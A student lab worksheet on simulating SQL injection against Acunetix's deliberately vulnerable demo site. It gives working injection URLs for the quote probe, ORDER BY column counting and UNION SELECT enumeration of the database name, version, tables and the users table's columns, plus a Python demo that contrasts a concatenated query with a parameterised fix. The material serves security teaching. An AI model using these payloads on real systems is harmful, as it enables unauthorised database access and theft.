WORKSHEET 3
Student Name: Ujjawal Sanadhya UID: 20BCS8242
Section/Group: 20BCS_KRG_WM1-B
Subject Name: Web and Mobile Security
Aim: Design a method to simulate the SQL injection.
Objective: To test SQL injection.
Software/Hardware Requirements: Windows 7 or later, Chrome or any other browser.
Introduction: Acunetix is a web-application security scanner that gives a 360-degree view of an organisation's web security.
This end-to-end web security scanner can identify vulnerabilities like XSS and misconfigurations. It can scan all types of apps, including complex web applications.
Acunetix offers specialised technologies that let you detect more and fix faster. The target used in the steps below, testphp.vulnweb.com, is the deliberately vulnerable demo site that Acunetix publishes for exactly this kind of testing.
Reading material (reference links):
SQL INJECTIONS:
SQL injection is a code injection technique that might destroy your
database.
SQL injection is one of the most common web hacking techniques.
SQL injection is the placement of malicious code in SQL statements,
via web page input.
SQL injection usually occurs when you ask a user for input, like their
username/userid, and instead of a name/id, the user gives you an SQL
statement that you will unknowingly run on your database.
Steps/ Methods/ Coding:
• Open the targeted URL given below in the browser.
• Open the link: http://testphp.vulnweb.com/
• Go to: http://testphp.vulnweb.com/listproducts.php?cat=1
• Inject the malicious code (cheat code): http://testphp.vulnweb.com/listproducts.php?cat=-1' (the stray single quote breaks the SQL statement; a database error on the page shows the cat parameter is used unsanitised in the query).
• Put a random number in an ORDER BY clause to find the number of columns in the result row (tuple): http://testphp.vulnweb.com/listproducts.php?cat=-1 order by 11 (an error means the number is larger than the column count; lower it until the page loads normally).
Information gathering:
1. To check the database name, go to:
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,7,8,9,10,database()--
2. To check the database version, go to:
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,7,8,9,10,version()--
Information to be fetched:
• Table names (all tables in the current database, from information_schema):
http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--
• Column names (of the users table; 0x7573657273 is the hex encoding of the string "users", written this way so no quotes are needed):
http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273
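As an added example (not part of the worksheet or of the demo site's code), the listproducts.php pattern reproduced locally in Python on an in-memory SQLite table: the handler that concatenates the cat parameter reacts to the worksheet's inputs (the stray quote, the ORDER BY probe and the UNION SELECT) the way the steps above expect, while a handler that validates and binds the parameter rejects them before they reach the database. The products table, its rows and the function names are constructed assumptions.

```python
import sqlite3

# Constructed stand-in for the demo site's database (assumption, not the real schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER, cat INTEGER, name TEXT);
        INSERT INTO products VALUES (1, 1, 'poster'), (2, 1, 'print'), (3, 2, 'frame');
    """)
    return conn

def list_products_vulnerable(conn, cat):
    """The listproducts.php pattern: the cat value is pasted into the SQL text."""
    sql = "SELECT id, cat, name FROM products WHERE cat=" + cat
    return conn.execute(sql).fetchall()

def list_products_fixed(conn, cat):
    """Hardened: check the type, then bind the value so it is never parsed as SQL."""
    if not cat.lstrip("-").isdigit():
        raise ValueError("cat must be an integer")
    sql = "SELECT id, cat, name FROM products WHERE cat=?"
    return conn.execute(sql, (int(cat),)).fetchall()

def probe(handler, cat):
    """Run one worksheet input through a handler and report what the page would show."""
    conn = make_db()
    try:
        return ("rows", handler(conn, cat))
    except sqlite3.OperationalError as e:   # database error leaking to the page
        return ("db_error", str(e))
    except ValueError:                      # input rejected before any SQL runs
        return ("rejected", None)

if __name__ == "__main__":
    for cat in ["1", "-1'", "-1 order by 4", "-1 order by 3", "-1 union select 1,2,3--"]:
        print(repr(cat), probe(list_products_vulnerable, cat), probe(list_products_fixed, cat))
```

"-1 order by 4" errors and "-1 order by 3" loads cleanly against the vulnerable handler, which is how the ORDER BY step pins the column count at three here; the UNION row (1, 2, 3) then appears in the product list, while the fixed handler answers "rejected" to every one of these inputs.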